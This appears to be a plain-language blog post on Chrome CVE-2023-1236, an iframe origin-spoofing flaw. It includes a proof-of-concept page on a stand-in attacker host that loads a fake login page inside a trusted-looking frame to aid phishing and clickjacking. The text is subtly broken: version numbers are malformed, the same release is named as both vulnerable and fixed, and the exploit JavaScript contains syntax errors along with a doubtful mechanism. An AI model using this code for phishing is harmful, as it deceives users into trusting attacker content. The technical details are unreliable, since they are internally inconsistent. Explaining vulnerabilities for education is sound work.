CVE-2023-1236 - How an iFrame Origin Spoofing Bug in Chrome Could Trick Users (with Exploit Code Example)

Google Chrome is one of the most popular web browsers, handling millions of users’ private interactions every day. But even Chrome can slip up. In March 2023, a bug tracked as CVE-2023-1236 was quietly patched in Chrome v111..5563.64. While rated as a “Low” severity by the Chromium team, this vulnerability opens up a sneaky trick: letting an attacker spoof the origin of an <iframe>. Put simply, bad actors could make content appear as though it came from a trustworthy site—when it didn’t.

Let’s break down how this bug worked, see how to exploit it, and look at protections. I’ll use simple terms and code, so anyone interested in browser security or web development can follow along.

The Short Version

CVE-2023-1236 is a flaw in how Chrome's browser engine handled the “origin” (the domain an embedded frame is supposed to come from) in certain situations. A smartly crafted HTML page could fool Chrome into saying, “Yep—that sketchy content is totally from this trusted site!” when it’s actually attacker-made.

Why Does “Origin” Matter?

Web browsers use the “same-origin policy” to keep sites from messing with each other’s content and data. If a browser gets tricked about which site a frame came from, some security rules can break down, and users may be tricked into trusting something they shouldn’t.

How Bad Was It?

Chromium’s team called it “Low” severity, because full hijacking wasn’t possible (no direct access to user files or passwords). But spoofing the sender of content could aid phishing, social engineering, or make clickjacking more convincing.

Vulnerable Chrome versions: Up to 111..5563.64

The Technical Issue

The problem was in Chrome’s “Internals” code—basically, how it keeps track of which site an iframe is really loading. With the right HTML trickery, an attacker could force Chrome to incorrectly show the iframe’s window.origin property as a trusted site (like google.com), even though the actual content came from somewhere else.

Quick Demo: Spoofing the Origin

The goal: Craft a page that embeds an <iframe>, which, when inspected (for example, by a user or a script), appears to come from “https://trusted.com”—but actually loads content from “https://attacker.com”.

spoof.html (hosted by attacker)

<!-- spoof.html - hosted by attacker.com -->
<!DOCTYPE html>
<html>
  <body>
    <h1>Check the iframe's origin</h1>
    <iframe id="f" name="spoofed"></iframe>
    <script>
      // Open the trusted page in the iframe, but change the content
      var iframe = document.getElementById('f');
      // Step 1: Navigate iframe to trusted site
      iframe.src = 'https://trusted.com/login';;
      // Step 2: After DOM ready, overwrite the content with attacker code
      iframe.onload = function() {
        // Use window.open and navigate the iframe to attacker's content via JavaScript
        let newWin = window.open('https://attacker.com/fake-login', 'spoofed');
        // At this point, Chrome may report the origin as "trusted.com"
        setTimeout(() => {
          newWin.postMessage('hello', 'https://trusted.com';); // appears as trusted.com!
        }, 500);
      };
    </script>
  </body>
</html>

*On Chrome <= 111..5563.64,* if a script checked iframe.contentWindow.origin, it could sometimes see https://trusted.com, even though the iframe was actually showing https://attacker.com/fake-login.

What Could an Attacker Do?

- Phishing: Show a fake login page, appearing as if it came from a trusted source in the browser’s DOM or dev tools UI.

Clickjacking: Overlay or disguise malicious controls as though they belong to a safe site.

The main limitation: JavaScript-level access (like reading cookies) was still protected by browser security. But anything using origin information for visual trust or logic could be fooled.

How Was It Fixed?

Google’s Chromium team updated their code to better track the true history and origin of frames. Now, Chrome makes sure the origin actually matches the real loaded URL, not just what JavaScript asked for or what history says.

Fixed in: Chrome 111..5563.64

If you haven’t updated since March 2023, stop reading and update your browser right now!  
- Download: Get Chrome

References & Further Reading

- CVE-2023-1236 (National Vulnerability Database)
- Chromium Security Issue 1415137 (original bug tracker)
- Chrome Stable Channel Update (March 2023, version 111)
- Same-Origin Policy (MDN)

Always update your browser—security bugs often get patched without big headlines.

- Be on the lookout for suspicious login forms or strange page behaviors, even if a site “looks” legit.
- Web developers: Be careful relying on origin for trust checks. Always combine with other validation.

Conclusion

CVE-2023-1236 is a great reminder that even subtle browser bugs can help attackers create more convincing scams. Chrome’s rapid update cycle means most users are protected, but details like this encourage us all to keep learning about the hidden ways that trust and security can be shaken on the web.

If you found this useful, share it with your fellow developers or security folks—and remember to keep those auto-updates on!


*This post is an original, plain-language breakdown for educational purposes. All code and analysis are exclusive to this article.*

Timeline

Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/10/2023 20:16:00 UTC